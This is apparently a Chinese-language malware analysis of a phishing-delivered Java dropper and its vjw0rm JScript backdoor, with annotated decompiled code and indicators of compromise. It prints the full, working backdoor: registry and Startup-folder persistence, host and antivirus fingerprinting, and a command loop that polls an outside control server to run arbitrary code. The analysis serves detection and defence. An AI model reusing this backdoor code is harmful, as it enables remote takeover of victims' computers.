日常巡逻检查某APT预警系统告警，发现一个Java编写的简单远控木马告警，投递手段为钓鱼邮件，样本通过反射机制和简单的混淆与编码多次打包后门代码。后门代码主要功能为下载文件并写入注册表开机启动实现持久化。
后门代码中包含有如下说明：“// Coded by v_B01 | Sliemerez -> Twitter : Sliemerez”，一个真实存在的阿拉伯人，他注册了多个社交账号，并且有投稿编程教程视频，🐂。根据这篇帖子“https://gathering.tweakers.net/forum/list_messages/1755533”，早在2017年他就开始投递该木马，4年来后门代码基本未变，🐂。

记录
样本反编译代码如下:
package uooypovlas;

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.lang.reflect.Method;
import java.util.ArrayList;

/**
 * Decompiled first stage of the sample (JAR dropper), re-wrapped for readability; tokens are the
 * decompiler's output unchanged.
 *
 * Analysis notes:
 * <ul>
 *   <li>Overall flow: {@code main} -&gt; reflective lookup of {@code dollar$$} -&gt; {@code exe}, which
 *       runs the returned argument array via {@code Runtime.exec}. {@code dollar$$} reads the embedded
 *       resource {@code resources/bynueqmffo} (resolved relative to this class's package), writes it to
 *       {@code <user.home>/_output.js} and yields {@code {"wscript", <that path>}}.</li>
 *   <li>Obfuscation is name-only (random identifiers, unused decoy constants, reflection instead of
 *       direct calls). No encryption of the payload: the resource is copied through as text.</li>
 *   <li>The listing does not compile as-is: {@code InvocationTargetException}, {@code Arrays},
 *       {@code File} and {@code FileNotFoundException} are used without imports and {@code exe}
 *       contains decompiler artifacts (see there).</li>
 *   <li>Host artifacts worth checking for: the dropped file {@code _output.js} in the user's home
 *       directory and a {@code wscript} child process spawned from a Java process.</li>
 * </ul>
 */
public class Mkhlxhzrhig {
    // Decoy constant: the literal "wscript" is used inline in engine$$$$; this field is not referenced here.
    private static final String liver$$$_$ = "wscript";

    /**
     * Writes the payload bytes to the stream, then flushes and closes it.
     * Invoked only reflectively (by name) from engine$$$$.
     *
     * @param paramOutputStream destination (a FileOutputStream on the dropped script path)
     * @param paramArrayOfByte  payload bytes
     * @throws IOException on write failure
     */
    private static void dejo$$$(OutputStream paramOutputStream, byte[] paramArrayOfByte) throws IOException {
        paramOutputStream.write(paramArrayOfByte);
        paramOutputStream.flush();
        paramOutputStream.close();
    }

    // Decoy constants: the same literals are used inline in colllll$ and engine$$$$; neither field is referenced here.
    private static final String webpackVersioning = "resources/bynueqmffo";
    private static final String _$JokerGame = "user.home";

    /**
     * Invokes the given method reflectively and executes the String[] it returns as a process.
     * The two {@code new Runtime[2]...} statements are decompiler artifacts (not valid Java); the
     * visible calls are {@code .getRuntime()} followed by {@code .exec(String[])}, i.e. this appears
     * to be {@code Runtime.getRuntime().exec(...)}.
     *
     * @param paramMethod a no-arg method on this class returning String[] (here: dollar$$)
     */
    private static void exe(Method paramMethod) throws InvocationTargetException, IllegalAccessException, IOException {
        new Runtime[2][1] = (new Runtime[2][0] = null).getRuntime();
        new Runtime[2][1].exec((String[])paramMethod.invoke(new Mkhlxhzrhig(), new Object[0]));
    }

    /** Thin wrapper: reads the stream into the builder via getFidia$$$ and returns it as a String. */
    private static String vickSon$$(InputStream paramInputStream, StringBuilder paramStringBuilder) throws IOException {
        return getFidia$$$(paramInputStream, paramStringBuilder).toString();
    }

    /**
     * Entry point. The {@code new String[0].length == 0} guard is always true (opaque predicate);
     * it looks up dollar$$ by name and hands it to exe.
     *
     * @param paramArrayOfString unused
     */
    public static void main(String[] paramArrayOfString) throws Exception {
        if (new String[0].length == 0) {
            Method method = Mkhlxhzrhig.class.getDeclaredMethod("dollar$$", new Class[0]);
            exe(method);
        }
    }

    /**
     * Reads the stream to exhaustion in 1 KiB chunks, appending each chunk as text.
     * Note: {@code new String(bytes, 0, n)} uses the platform default charset and may split a
     * multi-byte sequence at a chunk boundary; together with {@code getBytes()} in colllll$ the
     * payload round-trips through that charset rather than being copied byte-for-byte.
     *
     * @return the same builder that was passed in
     */
    private static StringBuilder getFidia$$$(InputStream paramInputStream, StringBuilder paramStringBuilder) throws IOException {
        byte[] arrayOfByte = new byte[1024];
        int i;
        while ((i = paramInputStream.read(arrayOfByte, 0, arrayOfByte.length)) > 0) {
            paramStringBuilder.append(new String(arrayOfByte, 0, i));
        }
        return paramStringBuilder;
    }

    /**
     * Builds the command line executed by exe: drops the payload (engine$$$$), then removes the
     * filler element at index 1 ("__$") so the result is {@code {"wscript", <dropped path>}}.
     */
    private static String[] dollar$$() throws Exception {
        ArrayList arrayList = new ArrayList(Arrays.asList(engine$$$$(colllll$())));
        arrayList.remove(1);
        return (String[])arrayList.toArray(new String[0]);
    }

    /**
     * Drops the payload to {@code <user.home>/_output.js} by reflectively calling dejo$$$ on a
     * FileOutputStream for that path.
     *
     * @param paramArrayOfByte payload bytes read from the embedded resource
     * @return {@code {"wscript", "__$", <dropped path>}}
     */
    private static String[] engine$$$$(byte[] paramArrayOfByte) throws NoSuchMethodException, FileNotFoundException, InvocationTargetException, IllegalAccessException {
        StringBuilder stringBuilder = new StringBuilder();
        stringBuilder.append(System.getProperty("user.home"));
        stringBuilder.append(File.separator);
        stringBuilder.append("_output.js");
        String[] arrayOfString = { "wscript", "__$", stringBuilder.toString() };
        FileOutputStream fileOutputStream = new FileOutputStream(arrayOfString[2]);
        Mkhlxhzrhig.class.getDeclaredMethod("dejo$$$", new Class[] { OutputStream.class, byte[].class }).invoke(new Mkhlxhzrhig(), new Object[] { fileOutputStream, paramArrayOfByte });
        return arrayOfString;
    }

    /**
     * Loads the embedded JScript payload from the JAR resource {@code resources/bynueqmffo}
     * (relative to this class's package) as text and returns its bytes in the platform charset.
     * The returned stream from getResourceAsStream is never closed.
     */
    private static byte[] colllll$() throws Exception {
        return vickSon$$(Mkhlxhzrhig.class.getResourceAsStream("resources/bynueqmffo"), new StringBuilder()).getBytes();
    }
}
后门代码:
// Coded by v_B01 | Sliemerez -> Twitter : Sliemerez
// Analysis notes (added): second stage dropped by the Java loader as <user.home>\_output.js and run
// under wscript. The original is a single line; it is re-wrapped here with no tokens changed.
// Detection artifacts visible in this script: registry marker HKCU\vjw0rm, Run-key value "SEJOKAOI5S",
// a copy of the script in the Startup folder, %temp% scripts launched via WScript.Shell.Run, and an
// HTTP POST every 7 s whose "User-Agent:" header carries the host fingerprint built by nf().

// ActiveX ProgIDs resolved by Cr(): 0 = shell, 1 = filesystem, 2 = Shell.Application, 3 = XMLHTTP client.
var j = ["WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];
// Registry fragments: g[2] is the infection marker, g[3] the per-user Run key path, g[5] the value type.
// g[1], g[4] and g[6] are not referenced anywhere in this listing.
var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];
// WMI moniker and class names used by Ob() for host fingerprinting.
var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];
var sh = Cr(0);   // WScript.Shell: registry read/write, env expansion, process launch
var fs = Cr(1);   // Scripting.FileSystemObject: file read/write/copy
var spl = "|V|";  // field separator in C2 responses
var Ch = "\\";    // field separator in the beacon string (nf)
var VN = "MYYEAR" + "_" + Ob(6);  // victim id: campaign tag + volume serial number
var fu = WScript.ScriptFullName;   // own path
var wn = WScript.ScriptName;       // own file name
var U;
// Marker handling: read HKCU\vjw0rm; when it does not exist yet, create it as "TRUE" if the script's
// second path component equals its own file name (i.e. it sits directly under a drive root), else "FALSE".
try {
  U = sh.RegRead(g[2]);
} catch(err) {
  var sv = fu.split("\\");
  if (":\\" + sv[1] == ":\\" + wn) {
    U = "TRUE";
    sh.RegWrite(g[2],U,g[5]);
  } else {
    U = "FALSE";
    sh.RegWrite(g[2],U,g[5]);
  }
}
// Persistence (Run key + Startup folder copy), then the command loop.
Ns();
// Command loop: POST /Vre every 7 s; the reply is split on "|V|" into [command, arg1, arg2].
do {
  try {
    var P = Pt('Vre','');
    P = P.split(spl);
    // Cl: terminate.
    if (P[0] === "Cl") {WScript.Quit(1);}
    // Sc: write arg1 to %temp%\arg2 and run it.
    if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}
    // Ex: evaluate arg1 as JScript in this process.
    if (P[0] === "Ex") {eval(P[1]);}
    // Rn: rewrite own file replacing the "MYYEAR" tag with arg1, relaunch hidden (//B) and exit.
    if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}
    // Up: self-update — write arg1 (with "|U|" turned back into "|V|") to %temp%\arg2, run it, exit.
    if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("|U|","|V|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}
    // Un: uninstall — arg1 is a server-supplied script with placeholders for own path/name and the
    // Run-key value name, which is filled in and eval'd before exiting.
    if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "SEJOKAOI5S";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}
    // RF: identical to Sc.
    if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}
  } catch(err) {}  // every failure (no network, parse error, denied write) is silenced; loop continues
  WScript.Sleep(7000);
} while (true) ;

// Expands an environment variable name, e.g. Ex("temp") -> %temp%.
function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}

// Synchronous HTTP POST to the C2 path C with body A; the host fingerprint from nf() is sent in a
// header literally named "User-Agent:" (trailing colon as written). Returns the response body.
function Pt(C,A) {var X = Cr(3);X.open('POST','http://javaslinns.duia.ro:1333/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}

// Beacon/fingerprint string, "\"-separated:
// VN \ COMPUTERNAME \ USERNAME \ OS caption \ AV product \ (empty) \ .NET 2.0 present (YES/NO) \ U \
function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}

// ActiveX factory over the ProgID table j.
function Cr(N) {return new ActiveXObject(j[N]);}

// WMI lookups: 2 = first Win32_OperatingSystem Caption; 4 = AV product DisplayName, trying
// root\securitycenter and then root\securitycenter2 (returns undefined if neither yields one);
// 6 = first Win32_LogicalDisk VolumeSerialNumber. The "break" after each "return" is unreachable.
function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.volumeserialnumber;break;}}}

// Persistence: (1) HKCU\...\Run\SEJOKAOI5S = "<own path>" (REG_SZ); (2) copy of the script into the
// shell special folder 7 (the per-user Startup folder), overwriting any existing copy. Both best-effort.
function Ns() {try {sh.RegWrite(g[0] + g[3] + "SEJOKAOI5S","\"" + fu + "\"",g[5]);} catch(err) {}try {var ap = Cr(2);fs.CopyFile(fu, ap.NameSpace(7).Self.Path + "\\" + wn,true);} catch(err) {}}
IOC
15332@ms61.hinet.net
l5332@ms61.hinet.net
hxxp://javaslinns.duia[.]ro:1333/
A29562CBDE90B5915698EAA6680F225C
